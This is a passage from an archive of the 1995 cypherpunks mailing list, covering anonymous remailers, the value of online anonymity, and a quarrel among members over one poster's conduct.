... unregulated broadcasting ..., sexual harassment, profanity, defamation,
forgery and fraud ... secretiveness is why abuse is easy.
problems are further exacerbated by Anonymous Server, which launders
computer messages, like money is laundered.
... difficulties in commercialization.
turf war rages between factions ...
attacks on business people ... vandalism, persist uncontrolled.
Worst of all are the ``canceller robots,'' ... the communications
the hackers wish to silence.
vigilantes routinely challenge free speech unabated ...
access providers, assume the role of censors, arbitrarily
closing accounts of those whom they disapprove.
one obvious way to bring much needed order, is through diplomacy.
The United States should lead in this.
... urge the Finnish government to deactivate the Anonymous Server.
establish a standard of recognizing laws existing at the point of
origin as controlling the message sender.
When conflicts arise, governmental diplomacy should again be the answer,
just as it is with other trade and communications issues.  Next, laws
already regulating behavior in the real world should be applied in
Cyberspace.  The Supreme Court should act ...  stating that crime is
crime, even when the criminal instrument is a computer keyboard.
legislation should be passed making access providers common carriers.
This will get them and under the guiding hand of the FCC ...
People need safety and order in Cyberspace just as they do in their homes
and on the streets.
The current state makes it clear that anarchy isn't working.
If governments don't bring order, chaos may soon dictate.


!@&^%&^!%@&$^%&^@%$&^!@$  I wish I could write worth beans.  I have never
been publish in any newspaper, anywhere.  They never like my rebuttals.  I
guess I get too rabid when I write.

- ---------------------------------------------------------|
| #include "std/disclaimer.h"     Michael P. Brininstool |
| mikepb@freke.lerctr.org      OR      mikepb@netcom.com |
|---------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.9 alpha I - BACK UP YOUR KEYRING BEFORE USE

iQCVAgUBLw8KT1gtYer4uLCdAQFLnQP/ZxwEsLtssYkk7F58v/ITcj9dx/Utyl4m
RzIdsgdg98h0c0WzDsXm2ZxKOK7rcucSMx+UF94jc0qVyTLk3T13Hm1n86WRJHSL
6vDdKiKP50WqjHg+1cBSMs9DOer/Q2wOCznMPK8LobYLII43YY2cvWhCt8JSC8o+
QpVkdv7IRqA=
=b3pW
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Sat, 7 Jan 95 22:13:50 PST
To: Carol Anne Braddock <carolann@mm.com>
Subject: Re: From me to me to you...The Actual Article
In-Reply-To: <Pine.3.89.9501070130.A14788-0100000@downburst.mm.com>
Message-ID: <Pine.3.89.9501072224.A18002-0100000@netcom18>
MIME-Version: 1.0
Content-Type: text/plain


The world is full of self important assholes.   You will go
mad trying to deal with people like him.

Life is too short.  From time to time post messages belittling
him and his service, and get on with a new service.

If you find a reasonably priced 28KB SLIP connection let me know.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are.  True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Sat, 7 Jan 95 22:23:30 PST
To: Carol Anne Braddock <carolann@mm.com>
Subject: Re: Big vs Little providers (punkette view)
In-Reply-To: <Pine.3.89.9501070420.H14788-0100000@downburst.mm.com>
Message-ID: <Pine.3.89.9501072255.A18002-0100000@netcom18>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 7 Jan 1995, Carol Anne Braddock wrote:

> Yes, at Netcom, I can now probably get much further, much faster.
> No I wouldn't subject myself or anyone to Winternet. But I wouldn't
> subject a newbie to Netcom either. I did it once and was sorry, too.

Actually you cannot.  No web pages, and their ftp is really bad.

I put my web stuff on http://nw.com/jamesd/

Cheap, good bandwidth, but I have trouble getting usage statistics.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are.  True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: storm@marlin.ssnet.com (Don Melvin)
Date: Sun, 8 Jan 95 13:24:19 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Abuse
In-Reply-To: <199501070554.VAA14679@netcom9.netcom.com>
Message-ID: <DMs3lKJXYvKM075yn@ssnet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


I'm joining this a bit late, but if you take the concept
proposed earlier about sticking a remailer stamp on each
encrypted envelope and that stamp being removed by the
remailer, each remailer will get paid for handling the
message.

The anonymity (assuming an FV-type postage sale) can be
restored by having one or more trusted postage exchanges.

You buy a hundred stamps, send them to the exchange, and
get back ninety-nine stamps from a pool.  You now have a
valid remailer stamp that does not have a link to you.

Of course, to keep the purchasers honest, the stamps should
probably be send from the purchase point (FV in this example).
And there would also have to be a fast clearing house so
stamps can't be reused/copies.
- --
America - a country so rich and so strong we can reward the lazy 
          and punish the productive and still survive (so far)

Don Melvin                  storm@ssnet.com                finger for PGP key.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLw9nAmvyi8p8VUiJAQHAsAQAj+hPIqS8lKFgRSr+m/aqrDp96W/ZTAw6
icQoAserp1gdWeOOaYKVZOgFA4Fn4BRM1ghs6mKO9nInVqJf9rCLpPhRCQ7ABPUi
lR9mHq4ib4wA7cWzpraXy+Bf6eht0DaPHO8aUFW1Hz8wDGLjtamzrknjhnUGyS1Z
LaKifu4R2o8=
=NXlf
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m00012@KANGA.STCLOUD.MSUS.EDU
Date: Sat, 7 Jan 95 21:17:19 PST
To: nelson@crynwr.com
Subject: Re: carrol(
Message-ID: <0098A20D.79070F00.2@KANGA.STCLOUD.MSUS.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I would put her in my killfile, but I don't know if vms has a kill
file capibility.  I use my unix accounts for important email, and
do not want to have to sift through the volume I get from the cypherpunks.

Otherwise, given that the percentage of interesting posts is going down
as a result of carrolann (and perhaps me too now), I think having an
elite group capable of banning certain people is perfectly ethical.

mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Sat, 7 Jan 95 20:19:31 PST
To: m00012@KANGA.STCLOUD.MSUS.EDU
Subject: Re: carrol(
In-Reply-To: <0098A1FE.894B5380.788@KANGA.STCLOUD.MSUS.EDU>
Message-ID: <m0rQpCA-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Sat, 07 Jan 1995 21:31:45 CST
   From: m00012@KANGA.STCLOUD.MSUS.EDU


   What is wrong with this person?

   ban her if you can, that's my opnion.

Gee, I don't know what everyone is complaining about, because I have:

	if (from = "carolann@mm.com") then delete

in my ~/.elm/filter-rules file.  I highly encourage everyone to have
their own mail filters, because then you don't have to convince anyone
to ban anyone, you just do your own banning.

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Sat, 7 Jan 95 20:53:29 PST
To: "L. Todd Masco" <cypherpunks@toad.com
Subject: Re: Too Much!
Message-ID: <9501080445.AA23191@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:16 AM 1/7/95 -0500, L. Todd Masco wrote:
>You might want to try reading it from NNTP, via c2.org or hks.net.  You
>can then use Kill files.

At that point, isn't the mailing list simply becoming a newsgroup?  For that 
matter, is there some reason that escapes me why it ISN'T a newsgroup?  I 
suppose the proportion of net.kooks is higher in a newsgroup than a mailing 
list, but arguably we're ALL net.kooks here.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Sat, 7 Jan 95 20:53:49 PST
To: Carol Anne Braddock  <carolann@mm.com>
Subject: Re: Soapbox mode on!(but short)
Message-ID: <9501080445.AB23191@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:22 AM 1/7/95, Carol Anne Braddock wrote:
>Dear Paul J. Ste. Marie,
>
>I was quietly going through my mail after an eight hour layoff.
>The first thing you do is lie.
>
>I have called you a liar. Point Blank!
>
>And for the honor of this very list, so that there is some
>credibility, I shall retrieve from a tin reader the actual
>posting, COMPLETE WITH HEADER.  

Interesting.  You did retrieve the message I posted, but not the article 
from alt.current-events.net-abuse.  If you want to call me a liar, that's 
fine, but post something with some relevance.  I'm not in the habit of 
scanning the news hierarchy for spam, and I'm perfectly willing to believe 
you stopped after ten groups, but that isn't what I recalled seeing in 
a.c-e.n-a.  I could be remebering things wrong, but if that is the case, 
kindly post something that actually shows the discussion in a.c-e.n-a was 
otherwise.

>And what makes creeps like you going is the ability to continue,
>to spread those lies. 

And now you're sounding like Martha Siegel.  My words were:

>> The discussion on alt.current-events.net-abuse seemed to indicate that the 
                                                  ^^^^^^^^^^^^^^^^^^
>> claim of "Just 10" above is a slight understandment.  The newsgroups seem to 
>> have been hit alphabetically, and I believe the total count was in the 
>> hundreds.

Am I rememebering a.c-e.n-a inaccurately, or have you simply decided not to 
rebut anything in the forum in which it was presented?  All I suggested is 
that your account bore checking out before people leaped to your defense.  
An unwillingness to have your story verified speaks for itself.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Harvey <warrior@infinet.com>
Date: Sat, 7 Jan 95 20:52:02 PST
To: Russell Nelson <nelson@crynwr.com>
Subject: Re: carrol(
In-Reply-To: <m0rQpCA-0008ZFC@crynwr.crynwr.com>
Message-ID: <Pine.3.89.9501072346.A23518-0100000@rigel>
MIME-Version: 1.0
Content-Type: text/plain



Could you tell me how to do this with Pine?  I would love to know how.

Regards,
Dave

> Gee, I don't know what everyone is complaining about, because I have:
> 
> 	if (from = "carolann@mm.com") then delete
> 
> in my ~/.elm/filter-rules file.  I highly encourage everyone to have
> their own mail filters, because then you don't have to convince anyone
> to ban anyone, you just do your own banning.

___
            /\  PGP the Cutting Edge of Privacy.
/vvvvvvvvvvvv \-----------------------------------\
| WARRIOR   (  |     PGP Key Id 0XC554E447D         > Magnus Frater Videt Tu
`^^^^^^^^^^^^ /===================================/
            \/  Finger for PGP 2.6.2 public Key.

      PGP Fingerprint 15 99 09 6D 11 C8 7C E0  08 C7 E6 95 46 65 FE F0
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
| Dave M. Harvey                                       warrior@infinet.com|
| PO Box 151311              	            dharvey@freenet.columbus.oh.us|
| Columbus, OH 43215-8311    	               fm063@cleveland.freenet.edu|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Date: Sun, 8 Jan 95 00:08:15 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Abuse
Message-ID: <ab354b460302100432ca@[137.110.24.249]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>
>See above. What's the difference between A-->B-->C-->B and A-->B-->C-->D ?
>If someone is logging messages and routing, it's less secure, but then so is
>the entire remailer system. Prime remailer operators are those who don't
>log.
>
>Maybe message size would tip off snoopers. This can be overcome with minor
>tweaking to existing remailer code by tacking on or or eliminating padding
>to messages. But logging still makes the whole system extremely vulnerable.
>
>=D.C. Williams  <dcwill@ee.unr.edu>
>

Message size can best be handled by using a remailer which uses messages
which never change size. Mixmaster is now ready for testing.
It still does not run on Linux or FreeBSD. I don't know what else it does
run on. It works great on Sun machines with gcc.

Since it is export restricted, send me mail and I will send you the name of
the hidden directory to get the file.
-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLw+btVVkk3dax7hlAQFW/QP9GZAIODaKt/VYsDGWUExiY4NUapvnQpZ/
FWtucyqX+4v9JnJv318PaKEs5xqHMcqtdq0fGZn6qNe1k5MbSVBb5wzfclMQm3LY
J7b3qv8zymedXpcmM2hm6bCnbpJkRivIjJTCDmg2yMKRH1Uv+Le5eN2haRxw3d76
e51KLqZJbh4=
=BKtC
-----END PGP SIGNATURE-----

--------------------------------------------------
Lance Cottrell  who does not speak for CASS/UCSD
loki@nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Home of "chain" the remailer chaining script.
For anon remailer info, mail remailer@nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 7 Jan 95 21:35:12 PST
To: cypherpunks@toad.com
Subject: cipher magazine
Message-ID: <v01510101ab352923d541@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



Someone just gave me this URL. It's probably in the cyphernomicon already,
but I had fun rooting around in here and thought I'd pass it around to
those who haven't seen it yet.


http://www.itd.nrl.navy.mil:80/ITD/5540/ieee/cipher/

Cheers,
Bob Hettinga

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Nelson <a015880t@bcfreenet.seflin.lib.fl.us>
Date: Sat, 7 Jan 95 21:43:02 PST
To: cyper punk <cypherpunks@toad.com>
Subject: how to subscribe
Message-ID: <Pine.3.89.9501080050.I17331-0100000@bcfreenet.seflin.lib.fl.us>
MIME-Version: 1.0
Content-Type: text/plain


can someone please mail me where to post to get subscribed



Jonathan Nelson
a015880t@bcfreenet.seflin.lib.fl.us






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mkj@october.ducktown.org
Date: Sat, 7 Jan 95 23:42:50 PST
To: cypherpunks@toad.com
Subject: The Value of Anonymity
Message-ID: <199501080700.CAA00298@october.ducktown.org>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

The value of anonymity, both on the nets and off, seems to be poorly
understood, even among its strongest defenders.  The positive value of
anonymity is not merely about protecting a few special groups such as
sexual-abuse victims and whistleblowers.  While these are certainly
valuable uses, if I believed that anonymity's positive impact were
limited to these outside-the-mainstream groups, then I probably
wouldn't accept the benefits of anonymity as outweighing its costs.

But in fact, I believe that anonymity has crucially important benefits
for nearly everyone.  There are several good arguments to be made, but
in the interest of brevity I'll focus on only one:

The explosive development of such personal data industries as targeted
marketing and consumer and demographic profiling, have demonstrated
that the business community considers personal data to be of great
economic value.  (There's a parallel observation to be made here about
governments, but I won't go into that now.)  There are also myriad
uses being made of personal data throughout the professions, from
labor negotiators to house burglars.  It is something of a truism that
anyone who knows enough about you can probably find a way to beat you,
either legally or illegally, often at great profit to themselves.

In an information-age society without extremely strong privacy
protections, the chief factor which makes the difference between
winners and losers may be how much information each of us has on
others, and how much they have on us.  Given this degree of economic
and social motivation, it is easy to imagine the sort of panopticon
which will soon arise on the Internet (and its descendants), unless
the strongest possible protections are adopted.  (And it is equally
easy to imagine who the biggest winners and losers will be.)

Relying on government to protect personal privacy is like appointing
the fox to guard the henhouse (or, as I seem to recall John Perry
Barlow once putting it, "... getting a peeping tom to install your
window blinds," or something like that).  In addition to the
government's own motivations for eroding privacy, all the above
economic considerations enter into government through lobbying,
desires to maximize tax revenues, fund-raising considerations, and a
whole raft of other avenues.

Furthermore, the only tools which government could bring to bear would
be a complex web of laws and regulations governing the circulation of
personal data.  Such laws and regulations would have to constantly
shift in a never ending cat-and-mouse game with business; and what's
more, many of these laws and regulations would necessarily conflict
with the free speech rights of private organizations.

Bottom line: Anonymity is the only available tool which puts control
over my own privacy firmly into my own hands, where it belongs, and
does so without infringing on anyone's freedom of speech.  Certainly
there are drawbacks, and anonymity may invite some abuses; but we have
survived anonymity's problems in the past, and 'tis better to suffer
in the hell we know than to be dragged into a new and hotter one.  The
only society without any crime is a society without any freedom.

My ($.02) conclusion: For preserving meaningful privacy, and for
preventing an ugly and probably irreversible transformation of our
world, anonymity is the best, perhaps the only viable tool we have.

					---  mkj

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLw+MZF11Wd4tm8clAQHC3QP8DrxVrUAUM+UKKeKzosFmCXGLkuwJYGDS
nE+pFEFIDC8cq7/35h99oIrCszmnkIjwso8PhwlwqRzuxFTZPMI3XuK5wt95tJCL
6Iy2oQ7wjCv+xnL2QjdAGNl68WD0ZhmPv9Q62cvWYjzRXnQJJF7dZiES5l14/NM2
Ij4rLh8AdEo=
=OGBF
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolb <carolb@barton.spring.com>
Date: Sun, 8 Jan 95 03:15:57 PST
To: mkj@october.ducktown.org
Subject: Re: The Value of Anonymity
In-Reply-To: <199501080700.CAA00298@october.ducktown.org>
Message-ID: <Pine.3.89.9501080401.A7875-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain



No, sometimes you don't learn till you've made a mistake.
As you could see I hurt really badly yesterday.

And now, so I can occupy myself quietly for a few days, are there
some good files to read so I can understand, and become a good remailer?


Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com                                       carolann@mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM

On Sun, 8 Jan 1995 mkj@october.ducktown.org wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> The value of anonymity, both on the nets and off, seems to be poorly
> understood, even among its strongest defenders.  The positive value of
> anonymity is not merely about protecting a few special groups such as
> sexual-abuse victims and whistleblowers.  While these are certainly
> valuable uses, if I believed that anonymity's positive impact were
> limited to these outside-the-mainstream groups, then I probably
> wouldn't accept the benefits of anonymity as outweighing its costs.
> 
> But in fact, I believe that anonymity has crucially important benefits
> for nearly everyone.  There are several good arguments to be made, but
> in the interest of brevity I'll focus on only one:
> 
> The explosive development of such personal data industries as targeted
> marketing and consumer and demographic profiling, have demonstrated
> that the business community considers personal data to be of great
> economic value.  (There's a parallel observation to be made here about
> governments, but I won't go into that now.)  There are also myriad
> uses being made of personal data throughout the professions, from
> labor negotiators to house burglars.  It is something of a truism that
> anyone who knows enough about you can probably find a way to beat you,
> either legally or illegally, often at great profit to themselves.
> 
> In an information-age society without extremely strong privacy
> protections, the chief factor which makes the difference between
> winners and losers may be how much information each of us has on
> others, and how much they have on us.  Given this degree of economic
> and social motivation, it is easy to imagine the sort of panopticon
> which will soon arise on the Internet (and its descendants), unless
> the strongest possible protections are adopted.  (And it is equally
> easy to imagine who the biggest winners and losers will be.)
> 
> Relying on government to protect personal privacy is like appointing
> the fox to guard the henhouse (or, as I seem to recall John Perry
> Barlow once putting it, "... getting a peeping tom to install your
> window blinds," or something like that).  In addition to the
> government's own motivations for eroding privacy, all the above
> economic considerations enter into government through lobbying,
> desires to maximize tax revenues, fund-raising considerations, and a
> whole raft of other avenues.
> 
> Furthermore, the only tools which government could bring to bear would
> be a complex web of laws and regulations governing the circulation of
> personal data.  Such laws and regulations would have to constantly
> shift in a never ending cat-and-mouse game with business; and what's
> more, many of these laws and regulations would necessarily conflict
> with the free speech rights of private organizations.
> 
> Bottom line: Anonymity is the only available tool which puts control
> over my own privacy firmly into my own hands, where it belongs, and
> does so without infringing on anyone's freedom of speech.  Certainly
> there are drawbacks, and anonymity may invite some abuses; but we have
> survived anonymity's problems in the past, and 'tis better to suffer
> in the hell we know than to be dragged into a new and hotter one.  The
> only society without any crime is a society without any freedom.
> 
> My ($.02) conclusion: For preserving meaningful privacy, and for
> preventing an ugly and probably irreversible transformation of our
> world, anonymity is the best, perhaps the only viable tool we have.
> 
> 					---  mkj
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBLw+MZF11Wd4tm8clAQHC3QP8DrxVrUAUM+UKKeKzosFmCXGLkuwJYGDS
> nE+pFEFIDC8cq7/35h99oIrCszmnkIjwso8PhwlwqRzuxFTZPMI3XuK5wt95tJCL
> 6Iy2oQ7wjCv+xnL2QjdAGNl68WD0ZhmPv9Q62cvWYjzRXnQJJF7dZiES5l14/NM2
> Ij4rLh8AdEo=
> =OGBF
> -----END PGP SIGNATURE-----
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 8 Jan 95 09:41:01 PST
To: cypherpunks@toad.com
Subject: Re:  The Value of Anonymity
Message-ID: <199501081741.JAA05815@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: mkj@october.ducktown.org
> The value of anonymity, both on the nets and off, seems to be poorly
> understood, even among its strongest defenders.  The positive value of
> anonymity is not merely about protecting a few special groups such as
> sexual-abuse victims and whistleblowers.  While these are certainly
> valuable uses, if I believed that anonymity's positive impact were
> limited to these outside-the-mainstream groups, then I probably
> wouldn't accept the benefits of anonymity as outweighing its costs.

These are good points.  However I think your presentation is a little too
oriented towards the libertarian perspective of distrusting government,
and also comes off sounding harshly competitive:

> It is something of a truism that
> anyone who knows enough about you can probably find a way to beat you,
> either legally or illegally, often at great profit to themselves.
> 
> In an information-age society without extremely strong privacy
> protections, the chief factor which makes the difference between
> winners and losers may be how much information each of us has on
> others, and how much they have on us.

I think most people don't think so much in terms of winners and losers,
of beating and being beaten.  Rather, I think it will be more acceptable
to couch the issue in simple privacy terms.  People do value their
privacy.  I don't think you have to overly justify the value of privacy.
A few examples of how little privacy people could actually have in a
non-anonymous network of the future should suffice to establish
motivation IMO.

> Given this degree of economic
> and social motivation, it is easy to imagine the sort of panopticon
> which will soon arise on the Internet (and its descendants), unless
> the strongest possible protections are adopted.

I like this phrase!  It nicely connotes the transparency of the nets.

> Relying on government to protect personal privacy is like appointing
> the fox to guard the henhouse (or, as I seem to recall John Perry
> Barlow once putting it, "... getting a peeping tom to install your
> window blinds," or something like that).  In addition to the
> government's own motivations for eroding privacy, all the above
> economic considerations enter into government through lobbying,
> desires to maximize tax revenues, fund-raising considerations, and a
> whole raft of other avenues.

This is where I think you are getting too libertarian for a broad
audience.  Also, this wording invites the reader to assume that anonymity
will lead to tax avoidance and evading laws.  Most people feel that they
are paying their own taxes, and if others avoid them then it just
increases the burden on themselves.  So except to certain selected groups
I would avoid playing this angle up.  I think your next argument
will have wider appeal:

> Furthermore, the only tools which government could bring to bear would
> be a complex web of laws and regulations governing the circulation of
> personal data.  Such laws and regulations would have to constantly
> shift in a never ending cat-and-mouse game with business; and what's
> more, many of these laws and regulations would necessarily conflict
> with the free speech rights of private organizations.

Be aware that this is in fact the "mainstream" solution to the problem.
There was some discussion on comp.org.eff.talk of some kind of committee
headed by EFF board member Esther Dyson which issued a statement on
privacy protection in the nets.  They issued the by-now traditional call
for laws along the lines of "information collected for one purpose cannot
be used for another purposes".  Like, VISA can't sell data on your
spending patterns, at least not without telling you.  Nobody criticized
this point; even the relatively net-aware civil liberties types mostly
explicitly endorsed this provision.  Laws like this are apparently
already in place in Europe.  So the momentum is in exactly this
direction.

I think your arguments are good ones; the government would undoubtedly
exempt itself from such rules (the IRS is already starting to use
dataveillance and matching to look for discrepencies between tax returns
and spending patterns), plus such provisions would seem to require a
labyrinth of exceptions, special cases, etc.  Eventually I could see laws
telling exactly what a business can and cannot do with the names of
people who phone or net in for information; yes, they can be kept on a
list for up to 6 months and sent additional promotional literature,
except that the business must require standard form 11832 to allow the
customer to get his name off the list, which must be handled within 5
working days for businesses with more than 100 employees, etc., etc.  You
could have volumes of this kind of stuff.  I think Tim wrote some essays
a long time back pointing out the absurdity of this approach, especially
if you tried to apply it to private individuals.

> Bottom line: Anonymity is the only available tool which puts control
> over my own privacy firmly into my own hands, where it belongs, and
> does so without infringing on anyone's freedom of speech.  Certainly
> there are drawbacks, and anonymity may invite some abuses; but we have
> survived anonymity's problems in the past, and 'tis better to suffer
> in the hell we know than to be dragged into a new and hotter one.  The
> only society without any crime is a society without any freedom.
> 
> My ($.02) conclusion: For preserving meaningful privacy, and for
> preventing an ugly and probably irreversible transformation of our
> world, anonymity is the best, perhaps the only viable tool we have.

That's a good summary.  This is definately an uphill battle, though.  I
see no significant standards body or organization of influence (except
for CPs, to the extent that we have any influence) which is moving in
this direction.  Add to this the costs of anonymity as Wei has been
discussing and it really isn't clear how to proceed.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLxAj1xnMLJtOy9MBAQGujQIAqooWk8OsbJzbAGpxIP+EYnPJM0kA7Ojm
/3i04Odoq/YZEH1Fv81/RbwsDahe+AGtmqU+VQ1KpjUTJuPfNKJ4dQ==
=w/FH
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Sun, 8 Jan 95 11:29:40 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Anonymity and cost
In-Reply-To: <199501080018.QAA11241@netcom4.netcom.com>
Message-ID: <199501081921.AA00714@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Tim May wrote:

> > At a very basic level, anonymous (not pseudonymous, like the remailers
> > are) messages are *cheaper*, because they carry less information; they
> > do not need to send the bits which identify the sender. 

> I think the meaning of "anonymous" here is clearly with respect to
> _traffic analysis_. The "cost of anonymity" is with respect to the
> costs and delays of using digital mixes (remailers)).

I don't think it's useful to redefine "anonymous" to include some 
messages which identify the author, and to exclude some messages which
do not identify the author. Then again, I'm not sure it's useful to
play Language Cop, either. But count mine as a voice in favor of
describing accurately what's being discussed. (Perhaps messages which
defy traffic analysis might be called "untraceable" but not 
"anonymous", unless they also do not identify an author.)

> > Anonymous video conferencing is available now; go to Kinko's, pay
> > cash for the use of their video conference room. Or, ask/convince
> > the recipient to consider the conversation "off the record". 

> Neither of these kinds of "anonymity" are cryptographically
> interesting, or strong.

I agree. I fear I've been influenced by some of the authors on that
Cypher[something] list who've recently argued persausively in favor
of applying technology appropriate to local conditions; e.g., not
wasting time on the techno-gadget-of-the-month when more pedestrian
but functional means are available.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxA7I33YhjZY3fMNAQGIQAQAqzEU6ru3/9/ScfHCZ6DnVK8bDewPVrg2
LAAZpVWuxfAW0W1oJ7NSXxrMmrIEX7MJetrpzlb+D5A1JuOVdtJ8gUwMxCRIMOeI
LU78Q/MuSp1oWbPEARDJ6JLZztU3Zs0bQH13kTY1tSZaZlQWj/cmWKUrmis4ZRkE
+px7kuMB8lg=
=Ty1L
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. Todd Masco" <cactus@hks.net>
Date: Sun, 8 Jan 95 11:54:15 PST
To: cypherpunks@toad.com
Subject: Re: Too Much!
Message-ID: <199501081959.OAA21945@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Paul J. Ste. Marie writes:
> At 01:16 AM 1/7/95 -0500, L. Todd Masco wrote:
> >You might want to try reading it from NNTP, via c2.org or hks.net.  You
> >can then use Kill files.
> 
> At that point, isn't the mailing list simply becoming a newsgroup?  For that 
> matter, is there some reason that escapes me why it ISN'T a newsgroup?  I 
> suppose the proportion of net.kooks is higher in a newsgroup than a mailing 
> list, but arguably we're ALL net.kooks here.


Not really, not until a huge number of hosts carry it as a newsgroup.
As for why cypherpunks isn't a newsgroup... IMO, it would end up carrying
too much traffic and be way too high profile.

As is, the people who really want to find it will and a hordes of riff-raff
(not all, mind you) are less likely to bother with it.

	-- Todd
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxBD/yoZzwIn1bdtAQHMrAF8ChmS332TabEbGslXsxzOLqIHEBOnJBYs
KIdzflR9PJWsYuNJBH6LrHtBWK/q7ejP
=T4k6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erik Selberg <speed@cs.washington.edu>
Date: Sun, 8 Jan 95 19:17:30 PST
To: Cypherpunks@toad.com
Subject: Re: From me to me to you...The Actual Article
Message-ID: <199501090318.TAA14113@meitner.cs.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain


Carol Anne Braddock writes:

> This is the article, and what I did with it. It is complete in it's
> entireity, from the bang paths, to the crosspostings. Please study them

> Now, the article,

> Date: Sat, 7 Jan 1995 01:26:26 -0600
> From: Carol Anne Braddock <carolann@vortex.mm.com>
> To: carolann@vortex.mm.com
> Newsgroups: soc.support.transgendered, alt.transgendered,
>   mn.general, alt.sex.femdom, alt.artcom, alt.sex.bondage, alt.sex,
>   comp.infosystems.www.users, alt.dreams.lucid, alt.dreams 
> Subject: (fwd) Re: Phil Zimmermann

So, I don't read any of those groups, and I could be dead wrong on all
